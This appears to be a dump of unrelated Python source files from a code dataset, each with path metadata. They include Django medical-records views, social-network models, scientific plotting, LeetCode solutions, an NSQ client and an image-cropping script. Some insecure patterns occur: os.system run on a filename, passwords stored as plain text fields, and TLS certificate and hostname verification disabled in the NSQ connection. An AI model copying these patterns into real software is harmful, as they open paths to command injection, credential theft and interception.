creado\n\tos.system(nom_arch)\n\t#produccion\n\t#return FileResponse(open(os.getcwd() +\"/misitio/pdfs/\"+ nom_arch, 'rb'), content_type='application/pdf')\n\t#desarrollo\n\treturn FileResponse(open(os.getcwd() +'\\\\pdfs\\\\'+ nom_arch,'rb'), content_type='application/pdf')\n\n\n@login_required(login_url='login_ini')\ndef coordenadas(request):\n\tvariable1 = 'Agregando coordenadas a la dirección de pernoctación del paciente'\n\tvariable2 = ''\n\trut_aux = request.session.get('rut_x') # rescata variable global \n\tpaciente = Pacientes.objects.get(rut=rut_aux)\n\t# DOS LINEAS OBLIGATORIAS\n\tform = PacientesForm(request.POST or None, request.FILES or None,instance=paciente)\n\tcoordenadas = request.POST.get('coordenadas') # valor del template\n\tpaciente_id = paciente.id\n\tif request.method == \"POST\":\n\t\t#if form.is_valid():\n\t\t#return HttpResponse(str(request.method))\n\t\tcursor = connection.cursor() # es necesario: from django.db import connection\t\n\t\tcursor.execute(\n\t\t\"update ai_pacientes set coordenadas = %s where rut = %s\",[coordenadas,rut_aux])\n\t\treturn redirect('ActualizaPac',paciente_id) # ficha paciente\n\tcontext = {\n\t\t\"variable1\":variable1,\n\t\t\"form\":form,\n\t\t\"variable2\":variable2,\n\t\t'paciente_id':paciente_id,\t\t\n\t\t}\n\treturn render(request,'ficha_coordenadas.html',context)\n\n@login_required(login_url='login_ini')\ndef georeferencia(request):\n\tvariable1 = 'Geo-referencia'\n\tsincoordenadas = '0'\n\trut_aux = request.session.get('rut_x') # rescata variable global \n\tpaciente = Pacientes.objects.get(rut=rut_aux) # busca\n\tpaciente_id = paciente.id\n\tcoordenadas = paciente.coordenadas\n\n\tif coordenadas == None:\n\t\t#context = {'sincoordenadas':sincoordenadas,'paciente_id':paciente_id}\n\t\treturn HttpResponse(\"Ficha no posee coordenadas de georeferenciación\")\n\t\t#messages.info(request, 'Ficha sin coordenadas de georefrerencia')\n\t\t#return redirect('ActualizaPac',paciente_id) # ficha paciente\n\n\tlat = coordenadas[0:10]\n\tlng = coordenadas[12:22]\n\tcontext = {\n\t\t'variable1':variable1,\n\t\t'paciente_id':paciente_id,\n\t\t'variable3':paciente.nombre,\n\t\t'lat':lat,\n\t\t'lng':lng,\n\t\t'sincooredenadas':1,\n\t}\t\n\t#return render(request,'georeferencia.html',context)\n\treturn render(request,'ejemplo_georeferencia.html',context)","sub_path":"misitio/ai/views - copia.py","file_name":"views - copia.py","file_ext":"py","file_size_in_byte":172955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"368602470","text":"from django.db import models\r\n\r\nclass User(models.Model): \r\n username = models.CharField(max_length=255)\r\n password = models.CharField(max_length=255)\r\n email = models.CharField(max_length=255)\r\n telefono = models.CharField(max_length=255, null=True)\r\n nombre = models.CharField(max_length=255)\r\n imagen = models.ImageField(upload_to='static/images/usuarios/', blank=True, null=True)\r\n fecha = models.DateTimeField(auto_now_add=True)\r\n \r\nclass Historia(models.Model):\r\n id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n imagen = models.ImageField(upload_to='static/images/historias/', blank=True, null=True)\r\n fecha = models.DateTimeField(auto_now_add=True)\r\n\r\nclass Pub(models.Model):\r\n id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n imagen = models.ImageField(upload_to='static/images/publicaciones/', blank=True, null=True)\r\n mensaje = models.TextField()\r\n fecha = models.DateTimeField(auto_now_add=True)\r\n \r\nclass PubComentario(models.Model):\r\n id_publicacion = models.ForeignKey(Pub, on_delete=models.CASCADE)\r\n id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n mensaje = models.TextField()\r\n \r\nclass PubLike(models.Model):\r\n id_publicacion = models.ForeignKey(Pub, on_delete=models.CASCADE)\r\n id_usuario = models.ForeignKey(User, on_delete=models.CASCADE)\r\n \r\nclass Follow(models.Model):\r\n id_usuario = models.ForeignKey(User, on_delete=models.CASCADE, related_name='id_usuario')\r\n id_usuario_seguido = models.ForeignKey(User, on_delete=models.CASCADE, related_name='id_usuario_seguido')","sub_path":"Alejandro/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"585276184","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ninlinks, inpackages = [], []\nwith open('in_squeeze.dat') as inData:\n for line in inData:\n data = line.split()\n print(data)\n inlinks.append(float(data[0]))\n inpackages.append(float(data[1]))\n\nprint(inlinks, inpackages)\noutlinks, outpackages = [], []\nwith open('out_squeeze.dat') as inData:\n for line in inData:\n data = line.split()\n outlinks.append(float(data[0]))\n outpackages.append(float(data[1]))\n\n\ndef N(t, nu, c, lamda):\n return nu+(c*c)*((t+lamda)**(-2))\n\n\nX1 = np.linspace(start=1, stop=47, num=1000)\nX2 = np.linspace(start=1, stop=47, num=1000)\nnuinlinks, cinlinks, lamdainlinks = -28.0, 265.0, 2.2\nNinlinks = N(X1, nuinlinks, cinlinks, lamdainlinks)\nnuoutlinks, coutlinks, lamdaoutlinks = 1.0, 110.0, 0.45\nNoutlinks = N(X2, nuoutlinks, coutlinks, lamdaoutlinks)\n\nplt.figure()\nplt.plot(inlinks, inpackages, '+')\nplt.xscale('log')\nplt.yscale('log')\nplt.plot(X1, Ninlinks, 'r--', lw=1)\n\nplt.figure()\nplt.plot(outlinks, outpackages, '+')\nplt.xscale('log')\nplt.yscale('log')\nplt.plot(X2, Noutlinks, 'r--', lw=1)\n\nplt.show()\n","sub_path":"SC/465_multidisciplinary_problems/arnab_ray/2019/assignments/debian/debian.py","file_name":"debian.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"41740473","text":"from typing import Iterable\nfrom statistics import median\n\n\ndef median_three(els):\n # your code here\n return els[:2] + [median(els[n:n + 3]) for n in range(len(els) - 2)]\n\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(list(median_three([1, 2, 3, 4, 5, 6, 7])))\n\n # These \"asserts\" are used for self-checking and not for an auto-testing\n assert list(median_three([1, 2, 3, 4, 5, 6, 7])) == [1, 2, 2, 3, 4, 5, 6]\n assert list(median_three([1])) == [1]\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n","sub_path":"O'Reilly/median_of_three.py","file_name":"median_of_three.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"564755690","text":"\"\"\"\r\nCount multiple patterns in the tags\r\n\"\"\"\r\n\r\nimport xml.etree.cElementTree as ET\r\nimport pprint\r\nimport re\r\n\r\nfrom collections import defaultdict\r\n\r\nlower = re.compile(r'^([a-z]|_)*$')\r\nlower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')\r\nproblemchars = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\r\n\r\nOSMFILE = \"Beaverton.osm\"\r\n\r\n# \r\ndef key_type(element, keys):\r\n '''\r\n This function utilizes regex to pull all the tags in the file and \r\n count the occurences of types of tags to estimate how many different \r\n types of tags there are and how many potectial problems there could be\r\n Args:\r\n element(string): element in the file. \r\n keys(dictionary): Dictionary used to keep count of elements.\r\n Returns:\r\n Dictionary: the keys\r\n '''\r\n if element.tag == \"tag\":\r\n for tag in element.iter('tag'):\r\n k = tag.get('k')\r\n if lower.search(element.attrib['k']):\r\n keys['lower'] = keys['lower'] + 1\r\n elif lower_colon.search(element.attrib['k']):\r\n keys['lower_colon'] = keys['lower_colon'] + 1\r\n elif problemchars.search(element.attrib['k']):\r\n keys['problemchars'] = keys['problemchars'] + 1\r\n else:\r\n keys['other'] = keys['other'] + 1\r\n \r\n return keys\r\n\r\n# Counts the different tags in the file. \r\ndef process_map(filename):\r\n keys = {\"lower\": 0, \"lower_colon\": 0, \"problemchars\": 0, \"other\": 0}\r\n for _, element in ET.iterparse(filename):\r\n keys = key_type(element, keys)\r\n\r\n return keys\r\n\r\nif __name__ == \"__main__\":\r\n pprint.pprint(process_map(OSMFILE))\r\n","sub_path":"tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"263884289","text":"#!/home/birac/anaconda2/bin/python\nfrom modeller import *\nfrom modeller.automodel import *\nimport re\nfrom Bio.PDB import *\nimport textwrap \n\n# Define these\narray = ['WT', 'E643Q', 'D646N', 'BOTH']\nchains = ['C']\nresidues_to_model = ['42','61']\n\ndef get_chains(chain_id):\n parser = PDBParser()\n structure = parser.get_structure(protein, '%s.pdb' % protein)\n class ChainSelect(Select):\n def accept_chain(self, chain):\n if chain.get_id() == '%s' % chain_id:\n return 1\n else:\n return 0\n io = PDBIO()\n io.set_structure(structure)\n io.save('%s_%s.pdb' % (protein, chain_id), ChainSelect() )\n\ndef make_sequence_align(chain_id):\n io = PDBIO()\n parser = PDBParser()\n ppb = PPBuilder()\n structure = parser.get_structure(protein, '%s_%s.pdb' % (protein, chain_id))\n f = open('%s_%s.ali' % (protein, chain_id), 'w')\n f.write('>P1;%s\\n' % protein)\n f.write('sequence:%s::::::::\\n' % protein)\n for pp in ppb.build_peptides(structure):\n seq = str(pp.get_sequence()) \n f.write('%s' % seq)\n f.write('*')\n env = environ()\n aln = alignment(env)\n mdl = model(env, file='3din_%s.pdb' % chain_id) #, model_segment=('FIRST:A','LAST:A'))\n aln.append_model(mdl, align_codes='3din', atom_files='3din_%s.pdb' % chain_id)\n aln.append(file='%s_%c.ali' % (protein, chain_id), align_codes='%s' % protein)\n aln.align2d()\n aln.write(file='%s-3din.ali' % protein, alignment_format='PIR')\n\ndef loop(prot, start, end):\n log.verbose()\n env = environ()\n class MyLoop(loopmodel):\n def select_loop_atoms(self):\n startint = int(start)\n endint = int(end)\n return selection(self.residue_range(startint, endint))\n m = MyLoop(env, inimodel='%s.pdb' % prot, sequence=prot)\n m.loop.starting_model= 1\n m.loop.ending_model = 10\n m.loop.md_level = refine.very_fast\n m.make()\n \nclass MyModel(automodel):\n def select_atoms(self):\n return selection(self.residue_range('246', '249'))\n'''\na = MyModel(env, alnfile = 'mafft.ali',\n knowns = 'Tom_model', sequence = 'Tom_loops')\na.starting_model= 1\na.ending_model = 1\n'''\n \nfor protein in array:\n for chain_id in chains:\n get_chains(chain_id)\n make_sequence_align(chain_id)\n #loop('%s_%s' % (protein, chain_id), residues_to_model[0], resdiues_to_model[1])\n","sub_path":"Atomistic/make_3dins_mut.py","file_name":"make_3dins_mut.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"290258838","text":"\nimport itertools\ndef next_closest_time(time):\n h, m = time.split(':')\n input_time = list(map(int, [h[0],h[1],m[0],m[1]]))\n hours = set((filter(check_valid, permutations(input_time))))\n hours.remove(tuple(input_time))\n if not hours:\n return to_str(to_minute(input_time))\n nearest_diff = 60*24\n ans = 0\n\n for i in hours:\n t = to_minute(i)\n # print(to_str(t))\n if t < to_minute(input_time):\n t += 60*24\n if t - to_minute(input_time) < nearest_diff :\n nearest_diff = t - to_minute(input_time)\n ans = t\n ans = (ans + 60*24) % (60*24)\n return to_str(ans)\n\n\ndef check_valid(t):\n hour = t[0]*10 + t[1]\n minute = t[2]*10 + t[3]\n return hour < 24 and minute < 60\n\ndef permutations(n):\n hours = list(itertools.product([n[0],n[1],n[2],n[3]],repeat=4))\n return hours\n\ndef to_minute(t):\n hour = t[0]*10 + t[1]\n minute = t[2]*10 + t[3]\n return hour*60 + minute\n\ndef to_str(m):\n return \"{:02d}:{:02d}\".format(*divmod(m,60))\n\n\nprint(next_closest_time(\"11:11\"))\n# print(to_minute([1,9,3,4]))\n# print(to_str(1174))\n","sub_path":"next_closest_time.py","file_name":"next_closest_time.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"590097165","text":"\"\"\"\nAuthor: Yvette WANG\n\"\"\"\nfrom collections import defaultdict\n\n\n# medium, v2, dp, bottom-up, 76ms\nclass Solution:\n def numsSameConsecDiff(self, N, K):\n \"\"\"\n :type N: int\n :type K: int\n :rtype: List[int]\n \"\"\"\n\n results = []\n\n closed = defaultdict(list)\n\n if N == 1:\n return list(range(0, 10))\n else:\n for i in range(0, 10):\n closed[(i, 1)] = [str(i)]\n count = 1\n while count < N:\n count += 1\n for i in range(0, 10):\n for cand in [i + K, i - K]:\n if -1 < cand < 10:\n closed[(i, count)] += [str(i) + res for res in closed[(cand, count - 1)]]\n\n for x in range(1, 10):\n results += [int(res) for res in closed[(x, N)]]\n\n return list(set(results))\n\n\n# # medium, v1, dp, recursion, 80ms\n# class Solution:\n# def numsSameConsecDiff(self, N, K):\n# \"\"\"\n# :type N: int\n# :type K: int\n# :rtype: List[int]\n# \"\"\"\n#\n# self.K = K\n# self.closed = defaultdict(list)\n#\n# results = []\n#\n# if N == 1:\n# return list(range(0, 10))\n# else:\n# for x in range(1, 10):\n# results += [int(str(x) + res) for res in self.getConsec(N - 1, x)]\n#\n# return list(set(results))\n#\n# def getConsec(self, remain, last):\n# if remain == 0:\n# self.closed[(remain, last)] = ['']\n# elif self.closed.get((remain, last), 0) == 0:\n# for cand in [last + self.K, last - self.K]:\n# if -1 < cand < 10:\n# self.closed[(remain, last)] += [str(cand) + res for res in self.getConsec(remain - 1, cand)]\n#\n# return self.closed[(remain, last)]\n\n\nif __name__ == \"__main__\":\n N = 3\n K = 7\n print(Solution().numsSameConsecDiff(N, K))\n ","sub_path":"967. Numbers With Same Consecutive Differences.py","file_name":"967. Numbers With Same Consecutive Differences.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"594003396","text":"import sys, os\nimport numpy as np\nimport h5py as h5\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\nimport palettable\nimport pylab\nfrom scipy.interpolate import interp1d\n\ncosmo_dir = os.path.dirname(os.path.dirname(os.getcwd())) + '/'\nsubDirectories = [x[0] for x in os.walk(cosmo_dir)]\nsys.path.extend(subDirectories)\nfrom tools import *\nfrom constants_cgs import *\nfrom spectra_functions import *\nfrom statistics_functions import get_highest_probability_interval\nfrom load_tabulated_data import load_power_spectrum_table, load_tabulated_data_boera, load_tabulated_data_viel\n\noutputs_file = '../../scale_outputs/outputs_cosmo_2048.txt'\noutputs = np.loadtxt( outputs_file )\n\ntransparent = True\n\n\n\n#Cosmological Parameters \nH0 = 67.66 \ncosmo_h = H0 / 100\nOmega_M = 0.3111\nOmega_L = 0.6889\n\n\n#Box parameters\nLbox = 50.0 #Mpc/h\nnPoints = 2048\nnx = nPoints\nny = nPoints\nnz = nPoints\nncells = nx * ny * nz\n\ndataDir = '/data/groups/comp-astro/bruno/'\n# dataDir = '/home/bruno/Desktop/ssd_0/data/'\n\nuvb = 'pchw18'\n# uvb = 'hm12'\ninput_dir = dataDir + 'cosmo_sims/{0}_hydro_50Mpc/skewers_{1}/'.format(nPoints, uvb, )\noutput_dir = dataDir + 'cosmo_sims/{0}_hydro_50Mpc/optical_depth_{1}/'.format(nPoints, uvb, )\ncreate_directory( output_dir )\n\n# snapshots_indices = [74, 77, 80, 83, 86, 90, 93, 96, 99, 102, 106, 110, 114, 119, 124, 130, 136, 143, 151, 159, 169]\n# snapshots_indices = [74, 76, 77, 79, 80, 82, 83, 85, 86, 88, 90, 91, 93, 94, 96, 97, 99, 101, 102, 104, 106, 108, 110, 112, 114, 117, 119, 122, 124, 127, 130, 133, 136, 139, 143, 147, 151, 155, 159, 164, 169]\nsnapshots_indices = list(range( 74, 170, 1))\n\nuse_mpi = True\n\nif use_mpi :\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n nprocs = comm.Get_size()\nelse:\n rank = 0\n nprocs = 1\n\n\nnSnap = snapshots_indices[rank]\n\n\n\nprint(\"nSnap: {0}\".format(nSnap))\n\noutputFileName = output_dir + 'optical_depth_{0}_interpolated.h5'.format(nSnap)\noutFile = h5.File( outputFileName, 'w')\n\nskewer_axis = 'x'\n\nn_skewers_total = 256**2\nn_skewers = 128*128\nskewers_ids = np.linspace(0, n_skewers-1, n_skewers ).astype(np.int) * n_skewers_total / n_skewers\n\n\ncosmo_spaces = [ 'real', 'redshift' ]\n\nfor space in cosmo_spaces:\n\n space_group = outFile.create_group( space )\n\n tau_vals = []\n F_mean_vals = []\n\n for i,skewer_id in enumerate(skewers_ids):\n #Load skewer data\n\n if i%(n_skewers/64)==0: \n text = ' Skewer {0}/{1}'.format(i, n_skewers)\n if rank==0:print_line_flush( text )\n inFileName = input_dir + 'skewers_{0}_{1}.h5'.format(skewer_axis, nSnap)\n inFile = h5.File( inFileName, 'r' )\n current_z = inFile.attrs['current_z']\n skewer_data = inFile[str(skewer_id)]\n density = skewer_data['density'][...]\n HI_density = skewer_data['HI_density'][...]\n temperature = skewer_data['temperature'][...]\n velocity = skewer_data['velocity'][...]\n inFile.close()\n\n\n x_comov, vel_Hubble, n_HI_los, tau_redshift = compute_optical_depth( H0, cosmo_h, Omega_M, Omega_L, Lbox, nPoints, current_z, density, HI_density, temperature, velocity, space=space )\n dv = ( vel_Hubble[1:] - vel_Hubble[:-1] )[0]\n\n F = np.exp(-tau_redshift)\n \n F_mean = F.mean()\n tau_eff = -1 * np.log( F_mean )\n tau_vals.append( tau_eff )\n F_mean_vals.append( F_mean )\n\n\n tau_vals = np.array( tau_vals )\n F_mean_vals = np.array( F_mean_vals )\n\n\n space_group.attrs['n_skewers'] = n_skewers\n space_group.create_dataset( 'tau_vals', data=tau_vals)\n space_group.create_dataset( 'F_mean_vals', data=F_mean_vals)\n\n#Save Optical Depth data\noutFile.attrs['current_z'] = current_z\n\noutFile.close()\nprint(\"\\nSaved File: \", outputFileName)\n\n\n","sub_path":"analysis/transmited_flux/old/get_optical_depth_interpolated.py","file_name":"get_optical_depth_interpolated.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"624851822","text":"import asyncio\nimport atexit\nimport json\nimport logging\nimport socket\nimport ssl\nfrom .exceptions import AuthFailedError\nfrom .exceptions import IdentifyFailedError\nfrom .exceptions import ServerError\nfrom .handlers import DeflateHandler, SnappyHandler\nfrom .helpers import prepare_cmd, to_size, parse_frame\nfrom aionsq.util import parse_addr\n\n\nclass Connection:\n\n def __init__(self, addr, *, auth_secret=None, cert=None, loop=None):\n self.addr = parse_addr(addr, host='127.0.0.1', proto='tcp')\n self.auth_secret = auth_secret\n self.cert = cert\n self.log = logging.getLogger(__name__)\n self.loop = loop or asyncio.get_event_loop()\n self._started = False\n self.sock = None\n self.z = None\n self.message_listeners = set()\n\n self.max_bytes = 16 * 1024\n self._buf = bytearray()\n\n def add_message_listener(self, callback):\n self.message_listeners.add(callback)\n\n async def start(self):\n if not self._started:\n infos = await self.loop.getaddrinfo(*self.addr,\n family=socket.AF_INET,\n type=socket.SOCK_STREAM)\n *opts, _, addr = infos[0]\n self.sock = socket.socket(*opts)\n self.sock.settimeout(0)\n resp = await self.loop.sock_connect(self.sock, addr)\n atexit.register(self.close)\n self.log.error(resp)\n self.sock.send(b' V2')\n self._started = True\n self.log.info('started')\n\n def close(self):\n self.sock.close()\n\n async def connect(self, **opts):\n from aionsq import __version__\n opts.setdefault('user_agent', 'aionsq/%s' % __version__)\n opts.setdefault('client_id', socket.getfqdn())\n opts.setdefault('hostname', socket.gethostname())\n opts.setdefault('feature_negotiation', True)\n if 'deflate' in opts:\n opts.setdefault('deflate_level', 6)\n data = json.dumps(opts)\n await self.cmd('IDENTIFY', body=data)\n features = await self.json()\n self.log.info('features %s', features)\n self.max_bytes = features['output_buffer_size']\n if features['tls_v1']:\n await self.upgrade_tls_v1(self.cert)\n if features['deflate']:\n await self.upgrade_deflate(6)\n if features['snappy']:\n await self.upgrade_snappy()\n if features['auth_required']:\n if not self.auth_secret:\n self.log.warning('auth required but auth_secret not set')\n auth_secret = self.auth_secret or '-'\n await self.cmd('AUTH', body=auth_secret)\n status = await self.json()\n self.log.info('auth status %s' % status)\n\n # TODO activate async now !!!()\n self.make_async()\n return features\n\n def make_async(self):\n self.loop.add_reader(self.sock.fileno(), self._read_ready)\n\n def bufferize_chunk(self, chunk):\n if self.z:\n chunk = self.z.decompress(chunk)\n self._buf += chunk\n\n async def upgrade_tls_v1(self, cert=None):\n self.log.info('upgrade tls')\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n if isinstance(cert, (list, tuple)):\n ctx.load_cert_chain(*cert)\n if isinstance(cert, dict):\n ctx.load_cert_chain(**cert)\n if isinstance(cert, str):\n ctx.load_cert_chain(cert)\n\n sock = ctx.wrap_socket(self.sock,\n server_side=False,\n do_handshake_on_connect=False)\n\n while True:\n try:\n sock.do_handshake()\n except ssl.SSLWantReadError:\n continue\n except ssl.SSLWantWriteError:\n continue\n break\n self.sock = sock\n await self.ok()\n\n async def upgrade_deflate(self, level):\n self.log.info('upgrade deflate')\n self.z = DeflateHandler(level)\n if len(self._buf):\n self._buf[:] = self.z.decompress(self._buf)\n self.log.warning('decompressed %s', self._buf)\n await self.ok()\n return\n\n async def upgrade_snappy(self):\n self.log.info('upgrade snappy')\n self.z = SnappyHandler()\n if len(self._buf):\n self._buf[:] = self.z.decompress(self._buf)\n self.log.warning('decompressed %s', self._buf)\n await self.ok()\n return\n\n async def cmd(self, cmd, *params, body=None):\n msg = prepare_cmd(cmd, *params, body=body)\n self.log.info('send %s', msg)\n await self.write(msg)\n\n async def write(self, msg):\n self.log.debug('write %s', msg)\n if self.z:\n msg = self.z.compress(msg)\n\n await self.loop.sock_sendall(self.sock, msg)\n\n def notify_listeners(self, frame):\n if frame.type == 0 and frame.body == '_heartbeat_':\n self.loop.create_task(self.send('NOP'))\n return\n elif frame.type == 0:\n self.log.debug('got %s', frame)\n return\n elif frame.type == 1 and frame.error in ('E_FIN_FAILED',\n 'E_REQ_FAILED',\n 'E_TOUCH_FAILED'):\n self.log.warning('failure %s', frame)\n return\n elif frame.type == 1:\n self.log.error('failure %s', frame)\n raise exc(frame)\n elif frame.type == 2:\n for listener in self.message_listeners:\n listener(frame)\n return\n raise NotImplementedError()\n\n async def json(self):\n data = await self.read()\n data = json.loads(data)\n self.log.debug('read json %s', data)\n return data\n\n async def ok(self):\n data = await self.read()\n return data == b'OK'\n\n def _read_ready(self):\n try:\n mbytes = self.max_bytes\n data = self.sock.recv(mbytes)\n self._data_received(data)\n except (BlockingIOError, InterruptedError, ssl.SSLWantReadError):\n return\n except Exception as error:\n self.log.exception(error)\n self.close()\n\n def _data_received(self, data):\n self.bufferize_chunk(data)\n while len(self._buf) > 4:\n data = self._buf[:4]\n size = to_size(data)\n self.log.debug('read size %s', size)\n if len(self._buf) < (4 + size):\n return\n\n data, self._buf[:4 + size] = self._buf[4:4 + size], []\n self.log.debug('read data %s', data)\n frame = parse_frame(data)\n self.notify_listeners(frame)\n\n async def _read(self, size):\n while len(self._buf) < size:\n chunk = bytearray()\n while True:\n try:\n mbytes = self.max_bytes\n chunk += await self.loop.sock_recv(self.sock, mbytes)\n except ssl.SSLWantReadError:\n continue\n else:\n break\n self.log.debug('read %s', chunk)\n self.bufferize_chunk(chunk)\n data, self._buf[:size] = self._buf[:size], []\n return data\n\n async def read(self):\n block = await self._read(4)\n size = to_size(block)\n self.log.debug('read size %s', size)\n data = await self._read(size)\n self.log.debug('read data %s', data)\n frame = parse_frame(data)\n self.log.debug('read frame %s', frame)\n if frame.type == 0:\n return frame.body\n if frame.type == 1:\n # fail fast\n raise exc(frame)\n # unexcepted\n raise Exception(frame)\n\n\ndef exc(frame):\n if frame.error == 'E_AUTH_FAILED':\n return AuthFailedError(frame.body)\n if frame.error == 'E_IDENTIFY_FAILED':\n return IdentifyFailedError(frame.body)\n return ServerError(frame)\n","sub_path":"aionsq/tcp/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"609380350","text":"#encoding=utf-8\n\n\nfrom selenium.webdriver.chrome.webdriver import WebDriver as ChromeDriver\nfrom selenium.webdriver.ie.webdriver import WebDriver as InternetExplorerDriver\nfrom selenium.webdriver.firefox.webdriver import WebDriver as FirefoxDriverDriver\n\nfrom selenium.webdriver import ChromeOptions\n\nclass DriverInit(object):\n logger=None\n \n def __init__(self,logger):\n self.logger=logger\n\n def getWebDriver(self, browser):\n print(browser) \n \n if browser.upper()==\"IE\":\n driver= InternetExplorerDriver()\n driver.maximize_window()\n self.logger.appendContent(\"新建IE驱动\")\n return driver\n elif browser.upper()==\"CHROME\":\n options = ChromeOptions()\n options.add_argument(\"test-type\")\n driver=ChromeDriver(chrome_options=options)\n driver.maximize_window()\n self.logger.appendContent(\"新建chrome驱动\")\n return driver\n elif browser.upper()==\"FIREFOX\":\n driver= FirefoxDriverDriver()\n driver.maximize_window()\n self.logger.appendContent(\"新建FireFox驱动\")\n return driver\n else:\n return None\n \n \n","sub_path":"CaseManager/bin/Debug/PythonSelenium2/src/frame/DriverInit.py","file_name":"DriverInit.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63618144","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 21 20:39:10 2020\r\n\r\n@author: daniel\r\n\"\"\"\r\n\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image, ImageDraw\r\nimport copy\r\nfrom shapely.geometry import Polygon, Point\r\nimport re\r\nimport numpy as np\r\n\r\n\r\n# start: read in data ---------------------------------------------------------\r\n\r\npath = os.getcwd()+\"/PatRec17_KWS_Data-master\\ground-truth\\locations\"\r\nground_truth = list()\r\nfor i in os.listdir(path):\r\n ground_truth.append([])\r\n paths = os.getcwd()+\"/PatRec17_KWS_Data-master\\ground-truth\\locations/\"+i\r\n with open(paths, \"r\") as data: \r\n for i in data:\r\n ground_truth[len(ground_truth)-1].append(i.split(\",\")) \r\n data.close()\r\n\r\n\r\n\r\npath = os.getcwd()+\"/PatRec17_KWS_Data-master/images/images_bw\"\r\nimages = list()\r\nfor i in os.listdir(path):\r\n paths = os.getcwd()+\"/PatRec17_KWS_Data-master\\images/images_bw/\"+i\r\n images.append(copy.deepcopy(np.asarray(Image.open(paths).convert(\"RGBA\"))))\r\n\r\n\r\n\r\n\r\n\r\nfor i,j in enumerate(ground_truth):\r\n current_image = images[i]\r\n \r\n new_folder = os.getcwd() + f\"/for_image_{i}\"\r\n \r\n if not os.path.exists(new_folder):\r\n os.mkdir(new_folder)\r\n \r\n for z,p in enumerate(j):\r\n\r\n polygon_cordinated = re.findall(r\" +\\d+\\.\\d+\", str(p))\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n if len(polygon_cordinated) == 0:\r\n pass\r\n else:\r\n \r\n \r\n \r\n \r\n poly = list()\r\n tup = list()\r\n for i,c in enumerate(polygon_cordinated):\r\n if(i > 0 and i%2 == 0):\r\n poly.append(tuple(tup))\r\n tup = list()\r\n tup.append(eval(c.strip()))\r\n poly.append(tuple(tup))\r\n \r\n\r\n \r\n #polygon cut\r\n \r\n mask_img = Image.new(\"L\" , (current_image.shape[1],current_image.shape[0]), 0)\r\n ImageDraw.Draw(mask_img).polygon(poly, outline = 1, fill = 1)\r\n mask = np.asarray(mask_img)\r\n \r\n \r\n\r\n if len(current_image.shape) == 3:\r\n current_image = current_image[:,:,0]\r\n \r\n cut_img = np.empty(current_image.shape)\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n cut_img[:,:] = current_image[:,:]*mask\r\n \r\n \r\n \r\n #Image.fromarray(cut_img).show()\r\n \r\n indexes = np.where(mask)\r\n \r\n \r\n\r\n\r\n print(cut_img)\r\n \r\n \r\n \r\n if len(indexes[0]) == 0:\r\n pass\r\n else:\r\n \r\n row_max = np.max(indexes[0])\r\n row_min = np.min(indexes[0])\r\n \r\n col_max = np.max(indexes[1])\r\n col_min = np.min(indexes[1])\r\n \r\n \r\n \r\n cut_img = Image.fromarray(cut_img).crop((col_min,row_min, col_max,row_max))\r\n \r\n # cut_img.show()\r\n \r\n cut_img = cut_img.convert(\"L\")\r\n \r\n cut_img.save(new_folder + f\"/word_{z}.png\", \"png\")\r\n \r\n \r\n \r\n \r\n \r\n \"\"\"\r\n cut_image = np.zeros((images[0].shape[0],images[0].shape[1]))+ 255\r\n count = 0\r\n for i,j in np.ndenumerate(images[0]):\r\n row, col = i\r\n \r\n if (row%100 == 0) and (col %10000 == 0):\r\n # print(row)\r\n a=5 \r\n \r\n if Polygon(poly).contains(Point(col,row)):\r\n cut_image[row][col] = images[0][row][col]\r\n count += 1\r\n \r\n cut_image[cut_image <= 10] = 0\r\n cut_image[cut_image > 10] = 255\r\n \r\n cut_cut_image = cut_image[cut_image < 255]\r\n print(cut_cut_image)\r\n Image.fromarray(cut_image).show()\r\n \r\n \"\"\"\r\n\r\n\r\n# end: read in data -----------------------------------------------------------","sub_path":"Word_extraction_ala_daniel.py","file_name":"Word_extraction_ala_daniel.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"39221522","text":"# -*- 